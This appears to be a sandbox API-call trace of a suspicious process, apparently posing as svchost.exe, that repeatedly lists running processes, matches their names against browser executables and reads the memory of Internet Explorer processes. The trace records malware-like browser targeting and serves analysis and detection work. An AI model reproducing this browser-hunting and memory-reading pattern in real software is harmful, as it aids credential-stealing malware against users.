	[0199.370] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.370] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0199.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.370] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.370] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0199.371] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x1938
	[0199.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.371] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0199.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.372] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.372] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0199.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.372] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.373] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0199.374] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x193c
	[0199.374] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.374] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0199.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.375] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.375] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.375] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0199.376] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.376] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.376] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0199.377] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1940
	[0199.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.377] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0199.377] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.377] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.378] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0199.378] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.378] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.378] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0199.379] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1944
	[0199.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.379] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0199.379] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.379] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.380] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0199.380] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.380] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.380] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0199.381] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x1948
	[0199.381] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.381] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0199.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.382] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.382] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0199.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.383] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.383] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0199.383] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x194c
	[0199.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.384] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0199.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.384] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.396] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0199.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.397] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.397] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0199.398] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1950
	[0199.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.398] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0199.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.398] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.398] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0199.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.398] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.399] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0199.399] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1954
	[0199.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.400] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0199.400] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.400] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.401] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0199.401] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.401] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.402] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0199.402] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x1958
	[0199.402] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.402] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0199.403] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.403] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.404] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0199.404] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.404] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.405] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0199.405] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x195c
	[0199.405] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.405] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0199.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.406] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.406] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.406] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0199.407] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.407] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.407] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0199.408] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1960
	[0199.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.408] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0199.408] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.409] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.409] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.409] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0199.410] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.410] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.410] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0199.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1964
	[0199.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.411] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0199.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.411] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.412] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0199.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.412] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.413] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0199.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x1968
	[0199.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.413] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0199.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.414] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0199.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.414] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0199.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.414] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.414] NtQueryInformationProcess (in: ProcessHandle=0x1968, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0199.415] ReadProcessMemory (in: hProcess=0x1968, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0199.415] ReadProcessMemory (in: hProcess=0x1968, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0199.415] ReadProcessMemory (in: hProcess=0x1968, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0199.415] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0199.415] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0199.416] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x196c
	[0199.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.416] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0199.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.416] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0199.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.416] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0199.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.417] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.417] NtQueryInformationProcess (in: ProcessHandle=0x196c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0199.417] ReadProcessMemory (in: hProcess=0x196c, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0199.417] ReadProcessMemory (in: hProcess=0x196c, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0199.417] ReadProcessMemory (in: hProcess=0x196c, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0199.417] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0199.417] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0199.418] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x1970
	[0199.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.418] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0199.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.418] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.419] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0199.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.419] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.419] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0199.420] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x1974
	[0199.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.420] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0199.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.420] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.421] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0199.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.421] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.421] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.422] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x1978
	[0199.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.422] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.422] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.423] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.423] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.423] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.424] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0199.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb98) returned 0x197c
	[0199.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.425] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.425] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.425] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.426] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.426] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0199.426] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x1980
	[0199.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.427] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0199.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.427] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.427] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0199.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.428] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.428] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0199.428] CloseHandle (hObject=0x188) returned 1
	[0199.428] Sleep (dwMilliseconds=0x64) 
	[0199.540] GetCurrentProcessId () returned 0x110
	[0199.540] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0199.543] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0199.543] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0199.544] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0199.545] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1984
	[0199.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.545] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.545] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.545] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.546] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0199.546] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0199.546] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1988
	[0199.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.546] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0199.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.547] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0199.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.547] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0199.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0199.547] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
